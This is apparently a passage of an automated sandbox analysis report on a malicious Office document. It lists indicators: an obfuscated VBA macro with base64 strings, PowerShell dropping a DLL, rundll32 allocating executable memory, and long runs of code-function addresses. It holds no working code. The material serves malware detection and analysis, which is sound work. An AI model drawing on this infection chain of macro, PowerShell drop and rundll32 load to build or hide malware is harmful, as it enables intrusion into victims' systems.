                    Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Y4o_ocvl0jti6oho0r, String createtextfile: Set EUMDPGt = UUoAB.CreateTextFile("XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM")
                    Document contains an embedded VBA with base64 encoded strings
                    Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String vRrzDEngIQvFPJfE
                    Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String kWzGMzIVefGB
                    Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String TthascRlxHZH
                    Source: VBA code instrumentation | OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String utFMeJhUKJhJ
                    Powershell drops PE file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll
                    Very long command line found
                    Source: unknown | Process created: Commandline size = 5293
                    Source: unknown | Process created: Commandline size = 5197
                    Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 5197
                    Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76E20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: 76D20000 page execute and read and write
                    Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Windows\SysWOW64\Vgmfknuplwnwb\
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_1000976F
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024B41F
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00242C63
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00253895
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024C0C6
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024EE78
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024568E
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002502C3
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002542DA
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00248736
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00247B63
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00254B41
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0025340A
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0025687F
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024F444
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024E05A
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0025A0AF
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002448BD
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002460B9
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002480BA
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0025889D
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002488E5
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00241CFA
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002520C5
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024F536
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00250D33
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024153C
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00257D03
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024B112
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00255D1D
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00258D1C
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0025511B
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002469A0
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00256DB9
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002561B8
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00259586
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024F98C
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00246D9F
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00247998
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002531E2
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002571EF
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00244A35
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00249A37
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00242A30
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00257A0F
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00255A61
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024EA4C
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002462A3
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00241280
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002512E2
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002526F5
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002496CD
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00258ADC
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024BB3A
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00250F0C
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00252B16
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00257F1F
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024C769
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00250B68
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024E377
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00251773
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00248F78
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00245B79
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00259B45
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00252349
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00258F49
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00246754
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024B75F
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002417AC
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002573AC
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0025878F
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024839D
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00253FE7
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002567E9
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_0024D7EB
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_002563C1
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00249FDC
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_00251BDF
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001EB41F
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001EEE78
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001E2C63
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F3895
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001E568E
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F42DA
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001EC0C6
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F02C3
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001E8736
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F4B41
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001E7B63
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F63C1
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F7A0F
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F340A
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001E9A37
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001E4A35
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001E2A30
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001EE05A
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001EEA4C
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001EF444
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F687F
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F5A61
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F889D
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001E1280
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001E48BD
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001E80BA
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001E60B9
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001FA0AF
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001E62A3
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F8ADC
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001E96CD
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F20C5
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001E1CFA
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F26F5
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001E88E5
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F12E2
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F7F1F
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F5D1D
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F8D1C
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F511B
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F2B16
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001EB112
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F0F0C
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F7D03
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001E153C
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001EBB3A
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001EF536
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F0D33
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001EB75F
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001E6754
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F2349
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F8F49
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F9B45
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001E8F78
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001E5B79
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001EE377
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F1773
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001EC769
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F0B68
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001E6D9F
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001E839D
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001E7998
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F878F
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001EF98C
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F9586
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F6DB9
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F61B8
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001E17AC
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F73AC
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001E69A0
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F1BDF
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001E9FDC
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F71EF
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001ED7EB
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F67E9
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F3FE7
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 8_2_001F31E2
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0019B41F
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0019EE78
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00192C63
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A3895
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0019568E
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A42DA
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A02C3
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0019C0C6
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00198736
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A4B41
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00197B63
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A63C1
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A340A
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A7A0F
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00192A30
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00194A35
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00199A37
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0019E05A
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0019EA4C
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0019F444
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A687F
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A5A61
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A889D
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00191280
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001960B9
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001980BA
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001948BD
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001AA0AF
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001962A3
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A8ADC
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001996CD
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A20C5
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00191CFA
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A26F5
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A12E2
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001988E5
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A511B
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A7F1F
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A8D1C
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A5D1D
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0019B112
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A2B16
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A0F0C
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A7D03
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0019BB3A
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0019153C
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A0D33
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0019F536
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0019B75F
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00196754
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A2349
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A8F49
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A9B45
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00195B79
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00198F78
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A1773
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0019E377
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0019C769
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A0B68
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00197998
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0019839D
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00196D9F
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A878F
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0019F98C
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A9586
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A61B8
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A6DB9
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001917AC
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A73AC
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001969A0
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A1BDF
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00199FDC
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0019D7EB
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A67E9
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A71EF
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A31E2
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_001A3FE7
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_0023B41F
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_00232C63
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_0023EE78
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_0023568E
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_00243895
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_0023C0C6
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_002402C3
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_002442DA
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_00238736
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_00237B63
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_00244B41
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_002463C1
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_00232A30
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_00239A37
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_00234A35
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_00247A0F
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_0024340A
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_00245A61
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_0024687F
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_0023F444
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_0023EA4C
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_0023E05A
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_002362A3
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_0024A0AF
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_002380BA
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_002360B9
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_002348BD
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_00231280
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_0024889D
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_002388E5
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_002412E2
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_002426F5
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_00231CFA
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_002420C5
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_002396CD
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_00248ADC
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_0023F536
                    Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 10_2_00240D33
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023BB3A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023153C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00247D03
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00240F0C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023B112
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00242B16
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00248D1C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00245D1D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00247F1F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0024511B
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023C769
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00240B68
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023E377
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00241773
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00235B79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00238F78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00249B45
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00248F49
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00242349
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00236754
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023B75F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002369A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002473AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002317AC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002461B8
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00246DB9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00249586
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0024878F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023F98C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00237998
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00236D9F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023839D
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00243FE7
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002431E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0023D7EB
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002471EF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002467E9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00241BDF
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00239FDC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023B41F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00232C63
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00245A61
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002360B9
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00231CFA
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002402C3
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00238736
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023153C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00247D03
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00242B16
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00248D1C
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023C769
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023E377
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00235B79
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00244B41
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00242349
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_002431E2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00239FDC
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00232A30
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00239A37
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00234A35
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00247A0F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0024340A
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023EE78
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0024687F
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0023F444
